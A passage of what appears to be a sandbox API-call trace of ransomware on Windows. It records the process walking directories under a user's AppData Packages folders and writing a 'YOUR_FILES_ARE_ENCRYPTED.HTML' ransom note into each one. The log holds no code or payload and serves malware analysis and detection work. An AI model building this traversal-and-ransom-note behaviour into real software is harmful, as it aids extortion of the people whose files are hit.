pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData") returned 114 [0118.666] GetProcessHeap () returned 0x600000 [0118.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.666] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData" [0118.666] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData\\*" [0118.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.666] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.666] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0118.666] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.666] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0118.666] GetProcessHeap () returned 0x600000 [0118.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.667] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.668] CloseHandle (hObject=0x324) returned 1 [0118.668] GetProcessHeap () returned 0x600000 [0118.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.668] GetProcessHeap () returned 0x600000 [0118.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.669] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0118.669] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.669] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState") returned 110 [0118.669] GetProcessHeap () returned 0x600000 [0118.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.670] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState" [0118.670] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState\\*" [0118.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.670] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.670] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0118.670] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.670] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0118.670] GetProcessHeap () returned 0x600000 [0118.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.671] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.672] CloseHandle (hObject=0x324) returned 1 [0118.672] GetProcessHeap () returned 0x600000 [0118.672] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.673] GetProcessHeap () returned 0x600000 [0118.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.673] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0118.673] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0118.673] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0118.673] GetProcessHeap () returned 0x600000 [0118.673] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0118.684] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0118.685] CloseHandle (hObject=0x31c) returned 1 [0118.686] GetProcessHeap () returned 0x600000 [0118.686] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.686] GetProcessHeap () returned 0x600000 [0118.686] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.687] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7f62ab, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9bfe3d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CON")) returned 1 [0118.687] StrStrIW (lpFirst="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.687] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy") returned 103 [0118.687] GetProcessHeap () returned 0x600000 [0118.687] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.688] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" [0118.688] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\*" [0118.688] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9bfe3d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.688] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9bfe3d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0118.688] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0118.688] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.688] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC") returned 106 [0118.688] GetProcessHeap () returned 0x600000 [0118.688] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.689] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC" [0118.689] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\*" [0118.689] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0118.689] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.689] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x302a2e45, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x302a2e45, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="BackgroundTransferApi", cAlternateFileName="BACKGR~1")) returned 1 [0118.689] StrStrIW (lpFirst="BackgroundTransferApi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.689] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi") returned 128 [0118.689] GetProcessHeap () returned 0x600000 [0118.689] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.696] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi" [0118.697] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\*" [0118.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x302a2e45, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x302a2e45, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.701] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x302a2e45, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x302a2e45, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.701] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16097cd3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16097cd3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x16097cd3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="09d16dcf-26b1-4e4c-b45c-f1d5b865d3a2.up_meta_body", cAlternateFileName="09D16D~2.UP_")) returned 1 [0118.701] StrStrIW (lpFirst="09d16dcf-26b1-4e4c-b45c-f1d5b865d3a2.up_meta_body", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.701] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\09d16dcf-26b1-4e4c-b45c-f1d5b865d3a2.up_meta_body") returned 178 [0118.701] PathFindExtensionW (pszPath="09d16dcf-26b1-4e4c-b45c-f1d5b865d3a2.up_meta_body") returned=".up_meta_body" [0118.701] lstrlenW (lpString=".up_meta_body") returned 13 [0118.701] PathFindExtensionW (pszPath="09d16dcf-26b1-4e4c-b45c-f1d5b865d3a2.up_meta_body") returned=".up_meta_body" [0118.701] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16097cd3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16097cd3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x16097cd3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="09d16dcf-26b1-4e4c-b45c-f1d5b865d3a2.up_meta_body", cAlternateFileName="09D16D~2.UP_")) returned 0 [0118.701] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.702] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 158 [0118.702] GetProcessHeap () returned 0x600000 [0118.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\backgroundtransferapi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.704] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.705] CloseHandle (hObject=0x32c) returned 1 [0118.705] GetProcessHeap () returned 0x600000 [0118.705] HeapFree (in: hHeap=0x600000, dwFlags=0x0, 